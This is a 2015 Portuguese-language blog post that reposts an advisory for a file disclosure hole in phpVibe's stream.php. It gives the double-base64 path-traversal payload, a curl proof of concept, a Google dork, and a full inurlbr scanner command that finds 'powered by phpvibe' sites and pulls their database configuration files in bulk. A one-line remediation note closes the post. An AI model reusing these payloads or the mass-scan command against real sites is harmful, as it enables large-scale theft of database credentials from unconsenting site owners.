segunda-feira, 13 de julho de 2015

phpVibe ALL versions LFD vulnerability Exploring with inurlbr

LFD exploiting vulnerability in phpvibe

PHPVibe - A php video script built for sharing video and media. PHPVibe video sharing cms: php video embed and video upload script, ffmpeg video conversion, Youtube,Vine
PHPVibe - A php video script built for sharing video and media. PHPVibe video sharing cms: php video embed and video upload script, ffmpeg video conversion, Youtube,Vine

# Exploit Title: phpVibe ALL versions LFD vulnerability
# Google Dork: "powered by phpvibe"
# Date: 2015/07/13 (july 13th)
# Exploit Author: ali ahmady -- Iranian Security Researcher (snip3r_ir[at]hotmail.com)
# Vendor Homepage: http://www.phpvibe.com/
# Software Link: http://get.phpvibe.com/
# Version: All versions
# Tested on: linux
http://0day.today/exploit/23877

Vulnerable file:
stream.php

POC:
http://target.tld/stream.php?file=../vibe_config.php@@media
http://target.tld/stream.php?file=TGk0dmRtbGlaVjlqYjI1bWFXY3VjR2h3UUVCdFpXUnBZUT09

Code:
$token = htmlspecialchars(base64_decode(base64_decode($_GET["file"])));

File parameter has no validation and sanitization!
exploition can be performed by adding "@@media" to the file name and base64 it two times as below (no registration needed).
With simple request can get access to the database configuration file Mysql.

Example:
curl  'http://TARGET/stream.php?file=TGk0dmRtbGlaVjlqYjI1bWFXY3VjR2h3UUVCdFpXUnBZUT09'

OUTPUT PRINT:
 Example: curl  'http://TARGET/stream.php?file=TGk0dmRtbGlaVjlqYjI1bWFXY3VjR2h3UUVCdFpXUnBZUT09'

Using inurlbr scanner for mass exploitation:
 Download script: https://github.com/googleinurl/SCANNER-INURLBR

- Creating our command

SET DORK:
--dork '"powered by phpvibe"'

SET OUTPUT FILE:
 -s telefone.txt 

SET EXPLOIT GET
--exploit-get '/stream.php?file=TGk0dmRtbGlaVjlqYjI1bWFXY3VjR2h3UUVCdFpXUnBZUT09'

SET FILTER 
Filter results in unique domains.
--unique 

SET VALIDATION
Valid results based on your return http code. 
      Example: --ifcode {ifcode}
      Usage:    --ifcode 200

COMPLETE COMMAND:
php inurlbr.php --dork '"powered by phpvibe"' -s telefone.txt  --exploit-get '/stream.php?file=TGk0dmRtbGlaVjlqYjI1bWFXY3VjR2h3UUVCdFpXUnBZUT09' --unique --ifcode 200

OUTPUT PRINT:

Solution:
Improving validation of parameters passed to the application.

Um comentário:

  1. tenho que pagar um café pros cês qualquer hora

    ResponderExcluir

............